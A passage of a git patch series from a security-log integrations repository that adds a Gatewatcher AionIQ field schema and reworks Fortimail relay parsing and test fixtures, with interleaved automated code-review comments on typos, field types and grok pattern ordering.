gatewatcher.notification.component + type: text +gatewatcher.notification.description: + description: notification description field + name: gatewatcher.notification.description + type: text +gatewatcher.notification.details: + description: notification details field + name: 
gatewatcher.notification.details + type: text +gatewatcher.notification.external_redirection: + description: notification external_redirection field + name: gatewatcher.notification.external_redirection + type: text +gatewatcher.notification.internal_redirection: + description: notification internal_redirection field + name: gatewatcher.notification.internal_redirection + type: text +gatewatcher.notification.resolution: + description: notification resolution field + name: gatewatcher.notification.resolution + type: text +gatewatcher.notification.risk: + description: notification risk field + name: gatewatcher.notification.risk + type: number +gatewatcher.notification.title: + description: notification title field + name: gatewatcher.notification.title + type: text +gatewatcher.observer.gcap.hostname: + description: GCap hostname field + name: gatewatcher.observer.gcap.hostname + type: text +gatewatcher.observer.gcap.ingress.interface.name: + description: Gatewatcher ingress interface name + name: gatewatcher.observer.gcap.ingress.interface.name + type: text +gatewatcher.observer.gcap.version: + description: GCap version observer field + name: gatewatcher.observer.gcap.version + type: text +gatewatcher.observer.log_format_version: + description: Observer log format version field + name: gatewatcher.observer.log_format_version + type: text +gatewatcher.observer.uuid: + description: Observer UUID field + name: gatewatcher.observer.uuid + type: text +gatewatcher.ransomware.alert_threshold: + description: ransomware alert_threshold field + name: gatewatcher.ransomware.alert_threshold + type: text +gatewatcher.ransomware.malicious_behavior_confidence: + description: ransomware malicious_behavior_confidence field + name: gatewatcher.ransomware.malicious_behavior_confidence + type: text +gatewatcher.ransomware.session_score: + description: ransomware session_score field + name: gatewatcher.ransomware.session_score + type: text +gatewatcher.rdp.channels: + description: rdp 
channels field + name: gatewatcher.rdp.channels + type: text +gatewatcher.rdp.client: + description: rdp client field + name: gatewatcher.rdp.client + type: text +gatewatcher.rdp.cookie: + description: rdp cookie field + name: gatewatcher.rdp.cookie + type: text +gatewatcher.rdp.event_type: + description: rdp event_type field + name: gatewatcher.rdp.event_type + type: text +gatewatcher.rdp.protocol: + description: rdp protocol field + name: gatewatcher.rdp.protocol + type: text +gatewatcher.rdp.server_supports: + description: rdp server_supports field + name: gatewatcher.rdp.server_supports + type: text +gatewatcher.rdp.tx_id: + description: rdp tx_id field + name: gatewatcher.rdp.tx_id + type: number +gatewatcher.reporting_token: + description: Token used by Gbox + name: gatewatcher.reporting_token + type: keyword +gatewatcher.retroact: + description: Analysis result per retroact + name: gatewatcher.retroact + type: keyword +gatewatcher.rfb.authentication: + description: rfb authentication field + name: gatewatcher.rfb.authentication + type: text +gatewatcher.rfb.client_protocol_version: + description: rfb client_protocol_version field + name: gatewatcher.rfb.client_protocol_version + type: text +gatewatcher.rfb.server_protocol_version: + description: rfb server_protocol_version field + name: gatewatcher.rfb.server_protocol_version + type: text +gatewatcher.rfb.server_security_failure_reason: + description: rfb server_security_failure_reason field + name: gatewatcher.rfb.server_security_failure_reason + type: text +gatewatcher.shellcode.analysis: + description: shellcode analysis field + name: gatewatcher.shellcode.analysis + type: text +gatewatcher.shellcode.encodings: + description: shellcode encodings field + name: gatewatcher.shellcode.encodings + type: text +gatewatcher.shellcode.id: + description: shellcode id field + name: gatewatcher.shellcode.id + type: text +gatewatcher.shellcode.sample_id: + description: shellcode sample_id field + name: 
gatewatcher.shellcode.sample_id + type: text +gatewatcher.shellcode.sub_type: + description: shellcode sub_type field + name: gatewatcher.shellcode.sub_type + type: text +gatewatcher.sigflow.action: + description: sigflow action field + name: gatewatcher.sigflow.action + type: text +gatewatcher.sigflow.category: + description: sigflow category field + name: gatewatcher.sigflow.category + type: text +gatewatcher.sigflow.gid: + description: sigflow gid field + name: gatewatcher.sigflow.gid + type: number +gatewatcher.sigflow.metadata: + description: sigflow metadata field + name: gatewatcher.sigflow.metadata + type: text +gatewatcher.sigflow.packet: + description: sigflow packet field + name: gatewatcher.sigflow.packet + type: text +gatewatcher.sigflow.packet_info: + description: sigflow packet_info field + name: gatewatcher.sigflow.packet_info + type: text +gatewatcher.sigflow.payload: + description: sigflow payload field + name: gatewatcher.sigflow.payload + type: text +gatewatcher.sigflow.payload_printable: + description: sigflow payload_printable field + name: gatewatcher.sigflow.payload_printable + type: text +gatewatcher.sigflow.rev: + description: sigflow rev field + name: gatewatcher.sigflow.rev + type: number +gatewatcher.sigflow.signature: + description: sigflow signature field + name: gatewatcher.sigflow.signature + type: text +gatewatcher.sigflow.signature_id: + description: sigflow signature_id field + name: gatewatcher.sigflow.signature_id + type: number +gatewatcher.sigflow.stream: + description: sigflow stream field + name: gatewatcher.sigflow.stream + type: number +gatewatcher.sip.method: + description: sip method field + name: gatewatcher.sip.method + type: text +gatewatcher.sip.request_line: + description: sip request_line field + name: gatewatcher.sip.request_line + type: text +gatewatcher.sip.uri: + description: sip uri field + name: gatewatcher.sip.uri + type: text +gatewatcher.sip.version: + description: sip version field + name: 
gatewatcher.sip.version + type: text +gatewatcher.smb: + description: smb metadata field + name: gatewatcher.smb + type: text +gatewatcher.smb.command: + description: smb command field + name: gatewatcher.smb.command + type: text +gatewatcher.smb.dialect: + description: smb dialect field + name: gatewatcher.smb.dialect + type: text +gatewatcher.smb.id: + description: smb id field + name: gatewatcher.smb.id + type: number +gatewatcher.smb.session_id: + description: smb session id field + name: gatewatcher.smb.session_id + type: number +gatewatcher.smb.status: + description: smb status field + name: gatewatcher.smb.status + type: text +gatewatcher.smb.status_code: + description: smb status_code field + name: gatewatcher.smb.status_code + type: text +gatewatcher.smb.tree_id: + description: smb tree_id field + name: gatewatcher.smb.tree_id + type: number +gatewatcher.smtp.helo: + description: smtp helo field + name: gatewatcher.smtp.helo + type: text +gatewatcher.smtp.mail_from: + description: smtp mail from field + name: gatewatcher.smtp.mail_from + type: text +gatewatcher.smtp.rcpt_to: + description: smtp recipients field + name: gatewatcher.smtp.rcpt_to + type: text +gatewatcher.snmp.community: + description: snmp community field + name: gatewatcher.snmp.community + type: text +gatewatcher.snmp.pdu_type: + description: snmp pdu_type field + name: gatewatcher.snmp.pdu_type + type: text +gatewatcher.snmp.vars: + description: snmp vars field + name: gatewatcher.snmp.vars + type: text +gatewatcher.snmp.version: + description: snmp version field + name: gatewatcher.snmp.version + type: number +gatewatcher.ssh.client.hassh: + description: ssh client hassh field + name: gatewatcher.ssh.client.hassh + type: text +gatewatcher.ssh.client.proto_version: + description: ssh client proto_version field + name: gatewatcher.ssh.client.proto_version + type: text +gatewatcher.ssh.client.software_version: + description: ssh client software_version field + name: 
gatewatcher.ssh.client.software_version + type: text +gatewatcher.ssh.server.hassh: + description: ssh server hassh field + name: gatewatcher.ssh.server.hassh + type: text +gatewatcher.ssh.server.proto_version: + description: ssh server proto_version field + name: gatewatcher.ssh.server.proto_version + type: text +gatewatcher.ssh.server.software_version: + description: ssh server software_version field + name: gatewatcher.ssh.server.software_version + type: text +gatewatcher.state: + description: Analysis result + name: gatewatcher.state + type: keyword +gatewatcher.syslog.message: + description: syslog message field + name: gatewatcher.syslog.message + type: text +gatewatcher.tftp.file: + description: tftp file field + name: gatewatcher.tftp.file + type: text +gatewatcher.tftp.mode: + description: tftp mode field + name: gatewatcher.tftp.mode + type: text +gatewatcher.tftp.packet: + description: tftp packet field + name: gatewatcher.tftp.packet + type: text +gatewatcher.timestamp_analyzed: + description: Timestamp of the alert processing by gcenter + name: gatewatcher.timestamp_analyzed + type: keyword +gatewatcher.timestamp_detected: + description: Timestamp of the file collection by gcap + name: gatewatcher.timestamp_detected + type: keyword +gatewatcher.tls: + description: TLS meta data field + name: gatewatcher.tls + type: text +gatewatcher.type: + description: Type of analysis + name: gatewatcher.type + type: keyword +gatewatcher.user_agent.major: + description: user_agent major field + name: gatewatcher.user_agent.major + type: text +gatewatcher.user_agent.minor: + description: user_agent minor field + name: gatewatcher.user_agent.minor + type: text +gatewatcher.user_agent.os.major: + description: user_agent os major field + name: gatewatcher.user_agent.os.major + type: text +gatewatcher.user_agent.os.patch: + description: user_agent os patch field + name: gatewatcher.user_agent.os.patch + type: text +gatewatcher.version: + description: '@version field' + 
name: gatewatcher.version + type: text diff --git a/GateWatcher/aioniq_ecs/_meta/manifest.yml b/GateWatcher/aioniq_ecs/_meta/manifest.yml new file mode 100644 index 000000000..d6480f719 --- /dev/null +++ b/GateWatcher/aioniq_ecs/_meta/manifest.yml @@ -0,0 +1,11 @@ +uuid: e9fbba55-89c2-4b6c-ad15-9a46412dd680 +name: Gatewatcher AionIQ V103 +slug: aioniq-v103 + +description: >- + A new detection and response platform (NDR) that enables to identify with certainty malicious actions and suspicious behaviors based on a mapping of all assets present on the information system. + +data_sources: + Network intrusion detection system: AIONIQ identify suspicious behaviors + Network protocol analysis: AIONIQ analyze traffic protocol + From a3f7bee5e8edff31b1b70decf0cad0233c5ab20e Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 11 Sep 2024 13:35:25 +0300 Subject: [PATCH 010/317] Fortimail - improve `relay` parsing --- Fortinet/fortimail/ingest/parser.yml | 21 +++++++++++++++++---- 1 file changed, 17 insertions(+), 4 deletions(-) diff --git a/Fortinet/fortimail/ingest/parser.yml b/Fortinet/fortimail/ingest/parser.yml index ec1ea7dbe..b3ccda162 100644 --- a/Fortinet/fortimail/ingest/parser.yml +++ b/Fortinet/fortimail/ingest/parser.yml 
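Review bot: Two field names in this new schema carry typos that will become permanent keys once detection rules reference them: `gatewatcher.ioc.campaings` (description says "campaigns") and `gatewatcher.ioc.extrernal_links` (description says "external_links"); rename them to `gatewatcher.ioc.campaigns` and `gatewatcher.ioc.external_links` before the parser ships, since renaming later breaks saved searches. Sibling fields also disagree on type in ways that will hurt correlation: `gatewatcher.nba.signature_id`, `nba.gid` and `nba.rev` are `text` while `gatewatcher.sigflow.signature_id`, `sigflow.gid` and `sigflow.rev` are `number`, and `gatewatcher.matched_event.file.stored`/`gaps`/`tx_id`/`size` are `text` while `gatewatcher.file.stored`/`gaps` are `boolean` and `file.tx_id` is `number`. Hash and fingerprint fields (`gatewatcher.file.hash.md5`, `file.hash.sha256`, `ssh.client.hassh`, `ssh.server.hassh`) are declared `text` although the file already uses `keyword` for exact-match identifiers such as `gatewatcher.gcap`; analysts pivot on hashes by exact value, so `keyword` is the safer choice. Note also that `gatewatcher.snmp.community` stores an SNMP community string, i.e. a credential, in cleartext; worth a comment such as `# contains the SNMP community string (credential) — restrict access to this field` so index access policies can account for it. Descriptions such as "beaocn possible_cnc field" and "smtp email subject_md5 field" on `gatewatcher.email.body_md5` are copy-paste slips.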
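Review bot: The `data_sources` descriptions in the new manifest read "AIONIQ identify suspicious behaviors" and "AIONIQ analyze traffic protocol", which are catalog-facing text; `Network intrusion detection system: AIONIQ identifies suspicious behaviors` and `Network protocol analysis: AIONIQ analyzes traffic protocols` would be the grammatical forms. The `name: Gatewatcher AionIQ V103` / `slug: aioniq-v103` pair is presumably a deliberate versioned module next to the existing `aioniq` one, but a one-line comment explaining why it is separate rather than an upgrade of the existing manifest would help the next maintainer.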
@@ -61,7 +61,9 @@ pipeline: properties: input_field: parsed_event.message.msg output_field: msg - pattern: 'to=%{DATA:email_to}, (delay=%{DATA:tmp_delay}, )?(xdelay=%{DATA:tmp_xdelay}, )?(mailer=%{DATA:tmp_mailer}, )?(pri=%{NUMBER:tmp_priority_level_msg}, )?(relay=%{HOSTNAME:destination_domain}? \[%{IP:_destination_ip}\], )?(dsn=%{DATA:tmp_dsn_version}, )?stat=%{GREEDYDATA:event_reason}' + pattern: 'to=%{DATA:email_to}, (delay=%{DATA:tmp_delay}, )?(xdelay=%{DATA:tmp_xdelay}, )?(mailer=%{DATA:tmp_mailer}, )?(pri=%{NUMBER:tmp_priority_level_msg}, )?(relay=%{RELAY_INFO:relay}, )?(dsn=%{DATA:tmp_dsn_version}, )?stat=%{GREEDYDATA:event_reason}' + custom_patterns: + RELAY_INFO: '(%{HOSTNAME:destination_domain}? \[%{IP:_destination_ip}\])|(\[%{IP:_destination_ip1}\] \[%{IP:_destination_ip2}\])' filter: "{{parsed_event.message.get('type') == 'event' and parsed_event.message.get('msg') and 'stat=' in parsed_event.message.get('msg')}}" - name: parse_webfilter_full_url @@ -140,7 +142,6 @@ stages: action.properties.nrcpts: "{{parse_event_with_no_stat.msg.nrcpts}}" action.properties.policy_id: "{{parsed_event.message.polid}}" action.properties.priority_level_msg: "{{parse_stat_message.msg.tmp_priority_level_msg or parse_event_with_no_stat.msg.pri}}" - action.properties.relay: '{{parse_event_with_no_stat.msg.relay.split(" ")[0].replace("[", "").replace("]", "")}}' action.properties.session_id: "{{parsed_event.message.session_id}}" action.properties.source_country: "{{parsed_event.message.client_cc}}" action.properties.spam_category: "{{parse_webfilter_full_url.msg.tmp_spam_category}}" 
@@ -153,8 +154,20 @@ stages: action.properties.xdelay: "{{parse_stat_message.msg.tmp_xdelay or parse_event_with_no_stat.msg.xdelay }}" - set: - source.ip: "{{parsed_event.message.relay.replace('[', '').replace(']', '')}}" - filter: "{{parsed_event.message.get('relay') != None}}" + action.properties.relay: > + {%- set tmp = parse_event_with_no_stat.msg.relay.split(" ") -%} + {%- if tmp[0] | length > 0 -%}{{ tmp[0].strip().strip('[]') }}{%- elif tmp[1] | length > 0 -%}{{ tmp[1].strip().strip('[]') }}{%- endif -%} + filter: "{{parse_event_with_no_stat.msg.relay | length > 0}}" + + - set: + action.properties.relay: > + {%- set tmp = parse_stat_message.msg.relay.split(" ") -%} + {%- if tmp[0] | length > 0 -%}{{ tmp[0].strip().strip('[]') }}{%- elif tmp[1] | length > 0 -%}{{ tmp[1].strip().strip('[]') }}{%- endif -%} + filter: "{{parse_stat_message.msg.relay | length > 0}}" + + - set: + source.ip: "{{final.action.properties.relay}}" + filter: "{{final.action.properties.relay | is_ipaddress}}" - set: source.ip: "{{parse_ui.msg.source_ip}}" From 2059e61812379b430d07e6c335186fc84cda098c Mon Sep 17 00:00:00 2001 
From: lvoloshyn-sekoia Date: Wed, 11 Sep 2024 13:46:32 +0300 Subject: [PATCH 011/317] Fix source.ip parsing --- Fortinet/fortimail/ingest/parser.yml | 66 +++++++++++++++---- Fortinet/fortimail/tests/encrypt.json | 3 - Fortinet/fortimail/tests/esmtp.json | 19 ++++-- Fortinet/fortimail/tests/event.json | 14 +++- Fortinet/fortimail/tests/event_smpt_to_1.json | 1 + Fortinet/fortimail/tests/event_smpt_to_2.json | 1 + .../fortimail/tests/event_smtp_STARTTLS.json | 12 +++- Fortinet/fortimail/tests/event_smtp_to.json | 4 +- .../fortimail/tests/event_smtp_to_bis.json | 4 +- Fortinet/fortimail/tests/kevent.json | 3 - Fortinet/fortimail/tests/relay_ip_only.json | 64 ++++++++++++++++++ Fortinet/fortimail/tests/short_event.json | 51 ++++++++++++++ ...ent_STARTTLS_client_local_certificate.json | 3 - ...ent_STARTTLS_server_local_certificate.json | 3 - ...nt_STARTTLS_server_signed_certificate.json | 3 - .../tests/smtp_event_to_user_unknown.json | 3 - Fortinet/fortimail/tests/spam.json | 3 - .../fortimail/tests/spam_antispam_url.json | 3 - Fortinet/fortimail/tests/spam_antivirus.json | 3 - .../fortimail/tests/spam_webfilter_url.json | 3 - .../fortimail/tests/spam_webfilter_url_1.json | 3 - Fortinet/fortimail/tests/statistics.json | 3 - Fortinet/fortimail/tests/virus.json | 3 - Fortinet/fortimail/tests/virus_1.json | 3 - 24 files changed, 210 insertions(+), 68 deletions(-) create mode 100644 Fortinet/fortimail/tests/relay_ip_only.json create mode 100644 Fortinet/fortimail/tests/short_event.json diff --git a/Fortinet/fortimail/ingest/parser.yml b/Fortinet/fortimail/ingest/parser.yml index b3ccda162..09a3fbb8b 100644 --- a/Fortinet/fortimail/ingest/parser.yml +++ b/Fortinet/fortimail/ingest/parser.yml 
@@ -7,6 +7,17 @@ pipeline: properties: input_field: "{{original.message}}" + - name: parse_short_event + external: + name: grok.match + properties: + input_field: original.message + output_field: msg + pattern: "to=%{DATA:email_to}%{DELIM}(delay=%{DATA:tmp_delay}%{DELIM})?(xdelay=%{DATA:tmp_xdelay}%{DELIM})?(mailer=%{DATA:tmp_mailer}%{DELIM})?(pri=%{NUMBER:tmp_priority_level_msg}%{DELIM})?(relay=%{RELAY_INFO:relay}%{DELIM})?(dsn=%{DATA:tmp_dsn_version}%{DELIM})?stat=%{GREEDYDATA:event_reason}" + custom_patterns: + DELIM: ', |\s' + RELAY_INFO: '(%{HOSTNAME:destination_domain}? \[%{IP:_destination_ip}\])|(\[%{IP:_destination_ip}\] \[%{IP:_destination_ip2}\])' + - name: parsed_msg external: name: grok.match @@ -61,9 +72,9 @@ pipeline: properties: input_field: parsed_event.message.msg output_field: msg - pattern: 'to=%{DATA:email_to}, (delay=%{DATA:tmp_delay}, )?(xdelay=%{DATA:tmp_xdelay}, )?(mailer=%{DATA:tmp_mailer}, )?(pri=%{NUMBER:tmp_priority_level_msg}, )?(relay=%{RELAY_INFO:relay}, )?(dsn=%{DATA:tmp_dsn_version}, )?stat=%{GREEDYDATA:event_reason}' + pattern: "to=%{DATA:email_to}, (delay=%{DATA:tmp_delay}, )?(xdelay=%{DATA:tmp_xdelay}, )?(mailer=%{DATA:tmp_mailer}, )?(pri=%{NUMBER:tmp_priority_level_msg}, )?(relay=%{RELAY_INFO:relay}, )?(dsn=%{DATA:tmp_dsn_version}, )?stat=%{GREEDYDATA:event_reason}" custom_patterns: - RELAY_INFO: '(%{HOSTNAME:destination_domain}? \[%{IP:_destination_ip}\])|(\[%{IP:_destination_ip1}\] \[%{IP:_destination_ip2}\])' + RELAY_INFO: '(%{HOSTNAME:destination_domain}? \[%{IP:_destination_ip}\])|(\[%{IP:_destination_ip}\] \[%{IP:_destination_ip2}\])' filter: "{{parsed_event.message.get('type') == 'event' and parsed_event.message.get('msg') and 'stat=' in parsed_event.message.get('msg')}}" - name: parse_webfilter_full_url 
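Review bot: `parse_short_event` is applied to every `original.message` without a `filter`, and the short_event.json fixture added later in this commit shows the values it feeds downstream are not clean: `email.to.address` is pinned as `"john.doe@example.com,"` and `log.level` as `"138084,"`, so a list separator leaks into the address and the short event's `pri=` message priority is read as a syslog level by whatever stage maps `pri` to `log.level` (outside this hunk). `DELIM: ', |\s'` lets `%{DATA:email_to}` stop at bare whitespace and presumably keeps the preceding comma whenever the separator is not exactly `, `; `DELIM: ',?\s+'` would keep the comma out of the capture. The `log.level` mapping should also be skipped when `parse_short_event.msg` matched, since `pri` means something different in that format.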
@@ -93,6 +104,20 @@ pipeline: output_field: msg pattern: '%{DATA}\(%{IP:source_ip}\)' + - name: parse_relay_data + external: + name: grok.match + properties: + input_field: parse_event_with_no_stat.msg.relay + output_field: msg + pattern: "%{RELAY:relay}" + custom_patterns: + RELAY: "%{RELAY_HOST_AND_IP}|%{RELAY_HOST_ONLY}|%{RELAY_IP_ONLY}" + RELAY_HOST_AND_IP: '%{HOSTNAME:destination_domain} \[%{IP:_destination_ip}\]' + RELAY_HOST_ONLY: "%{HOSTNAME:destination_domain}" + RELAY_IP_ONLY: ' \[%{IP:_destination_ip}\]' + filter: "{{parse_event_with_no_stat.get('msg') != None}}" + - name: set_ecs_fields - name: finalizer 
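Review bot: The `RELAY` alternation in `parse_relay_data` tries `RELAY_HOST_ONLY` before `RELAY_IP_ONLY`, and grok's `HOSTNAME` also accepts a dotted IPv4 literal; unless grok.match anchors the pattern to the whole field, a value such as `[1.2.3.4]` with no leading space matches none of the alternatives at the `[`, and at the next position `HOSTNAME` captures `1.2.3.4` as `destination_domain` instead of `_destination_ip`. Putting `RELAY_IP_ONLY` before `RELAY_HOST_ONLY`, or anchoring each alternative (`^\s?\[%{IP:_destination_ip}\]$`), removes the ambiguity. The `filter` checks `parse_event_with_no_stat.get('msg')` while the input is `parse_event_with_no_stat.msg.relay`; if `relay` is optional in that grok (its pattern is outside this hunk) the stage may run on an absent field — worth confirming.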
@@ -154,20 +179,39 @@ stages: action.properties.xdelay: "{{parse_stat_message.msg.tmp_xdelay or parse_event_with_no_stat.msg.xdelay }}" - set: - action.properties.relay: > - {%- set tmp = parse_event_with_no_stat.msg.relay.split(" ") -%} - {%- if tmp[0] | length > 0 -%}{{ tmp[0].strip().strip('[]') }}{%- elif tmp[1] | length > 0 -%}{{ tmp[1].strip().strip('[]') }}{%- endif -%} - filter: "{{parse_event_with_no_stat.msg.relay | length > 0}}" + event.reason: "{{parse_short_event.msg.event_reason}}" + email.to.address: "{{parse_short_event.msg.email_to.replace('<', '').replace('>', '')}}" + user.email: "{{parse_short_event.msg.email_to.replace('<', '').replace('>', '')}}" + action.properties.delay: "{{parse_short_event.msg.tmp_delay}}" + action.properties.xdelay: "{{parse_short_event.msg.tmp_xdelay}}" + action.properties.mailer: "{{parse_short_event.msg.tmp_mailer}}" + action.properties.priority_level_msg: "{{parse_short_event.msg.tmp_priority_level_msg}}" + action.properties.relay: "{{parse_short_event.msg._destination_ip}}" + action.properties.dsn_version: "{{parse_short_event.msg.tmp_dsn_version}}" + destination.domain: "{{parse_short_event.msg.destination_domain}}" + destination.address: "{{parse_short_event.msg.destination_domain}}" + destination.ip: "{{parse_short_event.msg._destination_ip}}" + filter: "{{parse_short_event.get('msg') != None}}" - set: action.properties.relay: > - {%- set tmp = parse_stat_message.msg.relay.split(" ") -%} - {%- if tmp[0] | length > 0 -%}{{ tmp[0].strip().strip('[]') }}{%- elif tmp[1] | length > 0 -%}{{ tmp[1].strip().strip('[]') }}{%- endif -%} - filter: "{{parse_stat_message.msg.relay | length > 0}}" + {%- if parse_relay_data.msg.destination_domain | length > 0 -%}{{parse_relay_data.msg.destination_domain}}{%- elif parse_relay_data.msg._destination_ip | length > 0-%}{{parse_relay_data.msg._destination_ip}}{%- endif -%} + destination.domain: "{{parse_relay_data.msg.destination_domain}}" + destination.address: 
"{{parse_relay_data.msg.destination_domain}}" + destination.ip: "{{parse_relay_data.msg._destination_ip}}" + filter: "{{parse_relay_data.msg.relay | length > 0}}" + + - set: + action.properties.relay: "{{parse_stat_message.msg._destination_ip}}" + filter: "{{parse_stat_message.msg._destination_ip | length > 0}}" + + - set: + action.properties.relay: "{{parse_stat_message.msg.destination_domain}}" + filter: "{{parse_stat_message.msg.destination_domain | length > 0}}" - set: - source.ip: "{{final.action.properties.relay}}" - filter: "{{final.action.properties.relay | is_ipaddress}}" + source.ip: "{{parsed_event.message.relay.replace('[', '').replace(']', '')}}" + filter: "{{parsed_event.message.get('relay', '') | is_ipaddress}}" - set: source.ip: "{{parse_ui.msg.source_ip}}" diff --git a/Fortinet/fortimail/tests/encrypt.json b/Fortinet/fortimail/tests/encrypt.json index 55f517be7..b15fd145d 100644 --- a/Fortinet/fortimail/tests/encrypt.json +++ b/Fortinet/fortimail/tests/encrypt.json @@ -23,9 +23,6 @@ "session_id": "ziuhiohzf" } }, - "host": { - "name": "abc" - }, "log": { "hostname": "abc", "level": "information" diff --git a/Fortinet/fortimail/tests/esmtp.json b/Fortinet/fortimail/tests/esmtp.json index f4785f088..a6e28d8a2 100644 --- a/Fortinet/fortimail/tests/esmtp.json +++ b/Fortinet/fortimail/tests/esmtp.json @@ -4,11 +4,23 @@ }, "expected": { "message": "to= delay=00:00:06 xdelay=00:00:06 mailer=esmtp pri=165917 relay= [3.4.5.6] dsn=2.0.0 stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)", + "event": { + "reason": "Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)" + }, "action": { "properties": { - "mailer": "esmtp" + "delay": "00:00:06", + "dsn_version": "2.0.0", + "mailer": "esmtp", + "priority_level_msg": "165917", + "relay": "3.4.5.6", + "xdelay": "00:00:06" } }, + "destination": { + "address": "3.4.5.6", + "ip": "3.4.5.6" + }, "email": { "to": { "address": [ 
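Review bot: The new `source.ip` stage strips brackets from `parsed_event.message.relay` but its `filter` runs `is_ipaddress` on the raw value, so a bracketed relay such as `[1.2.3.4]` is rejected before the `replace` ever runs while an unbracketed one never needed stripping; make the two agree, e.g. `filter: "{{parsed_event.message.get('relay', '').replace('[', '').replace(']', '') | is_ipaddress}}"`, after checking which form the top-level `relay=` key actually takes. In the `parse_relay_data` stage, `| length > 0-%}` is missing the space before `-%}`; it probably lexes, but it reads as `0-` and the other branches use `> 0 -%}`. That stage also copies `destination_domain` into both `destination.domain` and `destination.address`; since `HOSTNAME` accepts dotted IPv4 literals, an IP-only relay on the no-`stat=` path could surface as `destination.domain`, a case none of the new fixtures exercises.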
@@ -24,9 +36,8 @@ "3.4.5.6" ] }, - "source": { - "address": "3.4.5.6", - "ip": "3.4.5.6" + "user": { + "email": "jdoe@example.com" } } } \ No newline at end of file diff --git a/Fortinet/fortimail/tests/event.json b/Fortinet/fortimail/tests/event.json index 92ec21524..8128ab855 100644 --- a/Fortinet/fortimail/tests/event.json +++ b/Fortinet/fortimail/tests/event.json @@ -31,6 +31,11 @@ "user_identifier": "mail" } }, + "destination": { + "address": "notifications", + "domain": "notifications", + "ip": "1.1.1.1" + }, "email": { "from": { "address": [ @@ -41,9 +46,6 @@ "file": { "size": 26135 }, - "host": { - "name": "hostname" - }, "log": { "hostname": "hostname", "level": "information" @@ -52,6 +54,12 @@ "protocol": "ESMTP" }, "related": { + "hosts": [ + "notifications" + ], + "ip": [ + "1.1.1.1" + ], "user": [ "mail" ] diff --git a/Fortinet/fortimail/tests/event_smpt_to_1.json b/Fortinet/fortimail/tests/event_smpt_to_1.json index 5b6521b6b..a1375648e 100644 --- a/Fortinet/fortimail/tests/event_smpt_to_1.json +++ b/Fortinet/fortimail/tests/event_smpt_to_1.json @@ -20,6 +20,7 @@ "log_id": "0003007072", "mailer": "esmtp", "priority_level_msg": "165917", + "relay": "188.165.36.237", "session_id": "13KGXMHI007058-13KGXMHK007058", "user_identifier": "mail", "xdelay": "00:00:06" diff --git a/Fortinet/fortimail/tests/event_smpt_to_2.json b/Fortinet/fortimail/tests/event_smpt_to_2.json index 87ec664e1..a3d34d898 100644 --- a/Fortinet/fortimail/tests/event_smpt_to_2.json +++ b/Fortinet/fortimail/tests/event_smpt_to_2.json @@ -20,6 +20,7 @@ "log_id": "0003007072", "mailer": "esmtp", "priority_level_msg": "165917", + "relay": "smtp.example.org", "session_id": "13KGXMHI007058-13KGXMHK007058", "user_identifier": "mail", "xdelay": "00:00:06" diff --git a/Fortinet/fortimail/tests/event_smtp_STARTTLS.json b/Fortinet/fortimail/tests/event_smtp_STARTTLS.json index 699fc2d16..572980f42 100644 --- a/Fortinet/fortimail/tests/event_smtp_STARTTLS.json 
+++ b/Fortinet/fortimail/tests/event_smtp_STARTTLS.json @@ -30,14 +30,22 @@ "verify": "NO" } }, - "host": { - "name": "123" + "destination": { + "address": "something.com", + "domain": "something.com", + "ip": "1.1.1.1" }, "log": { "hostname": "123", "level": "information" }, "related": { + "hosts": [ + "something.com" + ], + "ip": [ + "1.1.1.1" + ], "user": [ "mail" ] diff --git a/Fortinet/fortimail/tests/event_smtp_to.json b/Fortinet/fortimail/tests/event_smtp_to.json index 5a378f013..1a399902a 100644 --- a/Fortinet/fortimail/tests/event_smtp_to.json +++ b/Fortinet/fortimail/tests/event_smtp_to.json @@ -27,6 +27,7 @@ "log_id": "0003007072", "mailer": "esmtp", "priority_level_msg": "50733", + "relay": "email.fr.", "session_id": "13KGXMHI007058-13KGXMHK007058", "user_identifier": "mail", "xdelay": "00:00:12" @@ -45,9 +46,6 @@ ] } }, - "host": { - "name": "1234" - }, "log": { "hostname": "1234", "level": "information" diff --git a/Fortinet/fortimail/tests/event_smtp_to_bis.json b/Fortinet/fortimail/tests/event_smtp_to_bis.json index 867dc06fb..cd5dfc0a6 100644 --- a/Fortinet/fortimail/tests/event_smtp_to_bis.json +++ b/Fortinet/fortimail/tests/event_smtp_to_bis.json @@ -27,6 +27,7 @@ "log_id": "0003014581", "mailer": "esmtp", "priority_level_msg": "40733", + "relay": "mail.eu.", "session_id": "13RDCREi014579-13RDCREj014579", "user_identifier": "mail", "xdelay": "00:00:01" @@ -45,9 +46,6 @@ ] } }, - "host": { - "name": "1234" - }, "log": { "hostname": "1234", "level": "information" diff --git a/Fortinet/fortimail/tests/kevent.json b/Fortinet/fortimail/tests/kevent.json index db597d152..a623e71c7 100644 --- a/Fortinet/fortimail/tests/kevent.json +++ b/Fortinet/fortimail/tests/kevent.json @@ -23,9 +23,6 @@ "log_id": "123" } }, - "host": { - "name": "hostname" - }, "log": { "hostname": "hostname", "level": "information" diff --git a/Fortinet/fortimail/tests/relay_ip_only.json b/Fortinet/fortimail/tests/relay_ip_only.json new file mode 100644 index 000000000..9e19ae40a 
--- /dev/null +++ b/Fortinet/fortimail/tests/relay_ip_only.json @@ -0,0 +1,64 @@ +{ + "input": { + "message": "time=15:03:24.344 device_id=FFFF log_id=YY type=event subtype=smtp pri=information user=mail ui=mail action=NONE status=N/A session_id=\"AAA-BBB\" msg=\"to=, delay=00:00:01, xdelay=00:00:01, mailer=esmtp, pri=2290731, relay= [1.2.3.4], dsn=2.0.0, stat=Sent (ok: Message 88943067 accepted)\"", + "event": { + "created": "2021-04-23T20:02:05.017771Z", + "id": "123" + }, + "log": { + "hostname": "abc" + } + }, + "expected": { + "message": "time=15:03:24.344 device_id=FFFF log_id=YY type=event subtype=smtp pri=information user=mail ui=mail action=NONE status=N/A session_id=\"AAA-BBB\" msg=\"to=, delay=00:00:01, xdelay=00:00:01, mailer=esmtp, pri=2290731, relay= [1.2.3.4], dsn=2.0.0, stat=Sent (ok: Message 88943067 accepted)\"", + "event": { + "action": "NONE", + "category": "smtp", + "kind": "event", + "message": "to=, delay=00:00:01, xdelay=00:00:01, mailer=esmtp, pri=2290731, relay= [1.2.3.4], dsn=2.0.0, stat=Sent (ok: Message 88943067 accepted)", + "reason": "Sent (ok: Message 88943067 accepted)" + }, + "action": { + "outcome_reason": "to=, delay=00:00:01, xdelay=00:00:01, mailer=esmtp, pri=2290731, relay= [1.2.3.4], dsn=2.0.0, stat=Sent (ok: Message 88943067 accepted)", 